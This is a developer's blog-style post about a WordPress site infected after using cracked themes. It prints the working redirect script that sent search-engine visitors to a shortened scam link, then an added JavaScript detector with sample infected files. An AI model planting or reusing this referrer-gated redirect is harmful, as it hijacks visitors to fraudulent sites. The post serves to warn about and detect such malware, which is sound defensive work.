As a web developer, I have learned firsthand the dangers of using cracked themes and plugins on a WordPress website. Even with security measures in place, it is possible for malware to infect the site. Once infected, it can be difficult to remove. That’s why it’s important to use reputable and secure themes and plugins from the start.
I experienced this when working on the website of a government institution in Sri Lanka. This institution wanted to build their website using a premium theme available on Envato. The client initially asked me to use cracked themes and plugins as a sample, but they ultimately decided to use the same ones on their live website. Within a week, the site was infected with a redirecting script that affected all of the search engine links. After that, the links in every search engine were redirected to fake scam sites.
Despite using multiple virus guard plugins, they were unable to detect and delete the script. Meanwhile, they came to their senses and purchased the original theme from Envato. Eventually, I had to manually search the source code to find the malicious script and use a search and replace plugin to remove it.
After that they replaced the cracked themes and plugins with original ones and were able to maintain the website without any further issues. So in this post I wanted to share my experience to demonstrate the importance of using secure and reputable themes and plugins from the start. I hope this gives you an idea of the potential risks involved with using cracked themes and plugins.
Below is the script that infected the site.
<script type="text/javascript">
  var regexp=/\.(sogou|soso|baidu|google|youdao|yahoo|bing|118114|biso|gougou|ifeng|ivc|sooule|niuhu|biso)(\.[a-z0-9\-]+){1,2}\//ig;
  var where =document.referrer;
  if(regexp.test(where))
  {
    window.location.href='https://tinyurl.com/yzypxycj'
  }
</script>
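The script above only redirects visitors whose referrer is a search engine, so someone who opens the site directly never sees it. The following heuristic check for that pattern is an added example, not part of the original post: the function name, the severity labels and the sample inputs (including the `example.invalid` URL) are constructed for illustration.

```javascript
// Added example: flag inline scripts that read document.referrer AND
// change the page location. Naming search engines raises confidence.
const SCRIPT_BLOCK = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
const READS_REFERRER = /document\s*\.\s*referrer/i;
// Assignment to *.location(.href) (not a == comparison), or location.replace/assign.
const SETS_LOCATION =
  /(?:window|document|top|self)\s*\.\s*location(?:\s*\.\s*href)?\s*=(?!=)|location\s*\.\s*(?:replace|assign)\s*\(/i;
const ENGINE_NAMES = /google|bing|yahoo|baidu|sogou|soso|youdao/gi;

function findReferrerRedirects(source) {
  const findings = [];
  for (const match of source.matchAll(SCRIPT_BLOCK)) {
    const body = match[1];
    if (!READS_REFERRER.test(body) || !SETS_LOCATION.test(body)) continue;
    const names = (body.match(ENGINE_NAMES) || []).map((n) => n.toLowerCase());
    const engines = [...new Set(names)];
    findings.push({
      // 1-based line where the <script> tag starts in the scanned text.
      line: source.slice(0, match.index).split("\n").length,
      engines,
      severity: engines.length >= 2 ? "high" : "review",
    });
  }
  return findings;
}

// Constructed sample: a theme file carrying a referrer-gated redirect.
const SAMPLE_INFECTED = [
  "<?php get_header(); ?>",
  '<div class="content">Welcome</div>',
  '<script type="text/javascript">',
  "var re=/\\.(google|bing|yahoo)(\\.[a-z0-9\\-]+){1,2}\\//ig;",
  "if(re.test(document.referrer)){window.location.href='https://example.invalid/landing'}",
  "</script>",
].join("\n");

// Constructed sample: reads the referrer but never redirects.
const SAMPLE_BENIGN =
  "<script>var ref = document.referrer; console.log(ref);</script>";

// Constructed sample: redirects on referrer without naming engines.
const SAMPLE_REVIEW =
  "<script>if(!document.referrer){window.location.href='/welcome'}</script>";

console.log(findReferrerRedirects(SAMPLE_INFECTED));
```

Run the function over theme and plugin files and over exported post and option content, since the script may be stored in the database rather than on disk; obfuscated variants will not match and still need manual review.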